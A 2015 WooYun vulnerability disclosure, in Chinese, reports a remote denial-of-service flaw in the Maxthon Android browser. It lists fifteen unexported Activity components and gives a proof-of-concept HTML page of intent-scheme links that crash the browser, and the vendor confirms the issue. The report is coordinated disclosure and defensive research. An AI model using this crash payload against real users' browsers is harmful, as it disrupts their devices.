当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121402

漏洞标题:傲游Android版浏览器远程拒绝服务漏洞

相关厂商:傲游

漏洞作者: 路人甲

提交时间:2015-06-25 14:40

修复时间:2015-09-23 14:48

公开时间:2015-09-23 14:48

漏洞类型:拒绝服务

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向第三方安全合作伙伴开放
2015-08-19: 细节向核心白帽子及相关领域专家公开
2015-08-29: 细节向普通白帽子公开
2015-09-08: 细节向实习白帽子公开
2015-09-23: 细节向公众公开

简要描述:

测试了所有未暴露的内部Activity组件,一共几十个啊有木有,很累啊有木有

详细说明:

#### 客户端版本,官网下载的最新版Maxthon_4.4.6.2000_remote_ChinaMainland.apk
#### 还是组件拒绝服务, WooYun: 傲游浏览器Android客户端多个漏洞(信息泄露/远程拒绝服务/SQL注入) 已经测试了所有导出的组件,这次测试的是所有没有导出的Activity组件。
由于傲游浏览器支持IntentScheme,所以,可以通过这种方式来触发此类漏洞,也就是可以实现远程拒绝服务攻击。
有问题的Activity组件如下,共15个

com.taobao.newxp.view.handler.umwall.AlimamaWall
com.mx.browser.cloud.MxCloudSendActivity
org.cocos2dx.javascript.AppActivity
com.maxthon.mge.LudeiGameActivity
com.maxthon.mge.CocosPlayGameRunnerActivity
com.chukong.cocosplay.host.CocosPlayHostActivity
com.chukong.cocosplay.host.CocosPlayHostActivityGroup
com.chukong.cocosplay.host.CocosPlayHostListActivity
com.chukong.cocosplay.host.CocosPlayHostTabActivity
com.chukong.cocosplay.host.CocosPlayHostFragmentActivity
com.chukong.cocosplay.host.CocosPlayHostRemoteActivity
com.chukong.cocosplay.host.CocosPlayHostRemoteActivityGroup
com.chukong.cocosplay.host.CocosPlayHostRemoteListActivity
com.chukong.cocosplay.host.CocosPlayHostRemoteTabActivity
com.chukong.cocosplay.host.CocosPlayHostRemoteFragmentActivity


#### Crash截图,以及部分日志信息

0.JPG


1.JPG


2.JPG


3.JPG


4.JPG


5.JPG


#### POC IntentScheme,构造的html页面代码:

<html>
<body>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.navigation.QuickDialAddActivity;end">com.mx.browser.navigation.QuickDialAddActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.taobao.newxp.view.handler.umwall.AlimamaWall;end"><span style="color:red">com.taobao.newxp.view.handler.umwall.AlimamaWall</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.cloud.MxCloudSendActivity;end"><span style="color:red">com.mx.browser.cloud.MxCloudSendActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.preferences.BrowserPreferencesPage;end">com.mx.browser.preferences.BrowserPreferencesPage</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.VoteDialogActivity;end">com.mx.browser.VoteDialogActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.camera.CropImageActivity;end">com.mx.camera.CropImageActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.account.MailRegisterActivity;end">com.mx.browser.account.MailRegisterActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.account.PhoneRegisterActivity;end">com.mx.browser.account.PhoneRegisterActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.navigation.MxFullscreenWebviewActivity;end">com.mx.browser.navigation.MxFullscreenWebviewActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.mx.browser.readmode.ReadModeActivity;end">com.mx.browser.readmode.ReadModeActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.maxthon.mge.MgeActivity;end">com.maxthon.mge.MgeActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/org.cocos2dx.javascript.AppActivity;end"><span style="color:red">org.cocos2dx.javascript.AppActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.maxthon.mge.MgeOnlineGameRunner;end">com.maxthon.mge.MgeOnlineGameRunner</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.maxthon.mge.EgretGameActivity;end">com.maxthon.mge.EgretGameActivity</a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.maxthon.mge.LudeiGameActivity;end"><span style="color:red">com.maxthon.mge.LudeiGameActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.maxthon.mge.CocosPlayGameRunnerActivity;end"><span style="color:red">com.maxthon.mge.CocosPlayGameRunnerActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostActivityGroup;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostActivityGroup</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostListActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostListActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostTabActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostTabActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostFragmentActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostFragmentActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostRemoteActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostRemoteActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostRemoteActivityGroup;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostRemoteActivityGroup</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostRemoteListActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostRemoteListActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostRemoteTabActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostRemoteTabActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.host.CocosPlayHostRemoteFragmentActivity;end"><span style="color:red">com.chukong.cocosplay.host.CocosPlayHostRemoteFragmentActivity</span></a></h1>
<h1><a href="intent:#Intent;component=com.mx.browser/com.alipay.sdk.app.H5PayActivity;end">com.alipay.sdk.app.H5PayActivity</a></h1>
</body>
</html>


#### 使用傲游浏览器访问效果如图(红字显示的都是有问题的,从上面的html代码也可以看出哪些标红了)

6.JPG

漏洞证明:

修复方案:

作为浏览器,内部组件也要正确处理异常的intent消息

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-06-25 14:46

厂商回复:

我们已经在修复这些漏洞,非常感谢路人甲提供的信息。

最新状态:

暂无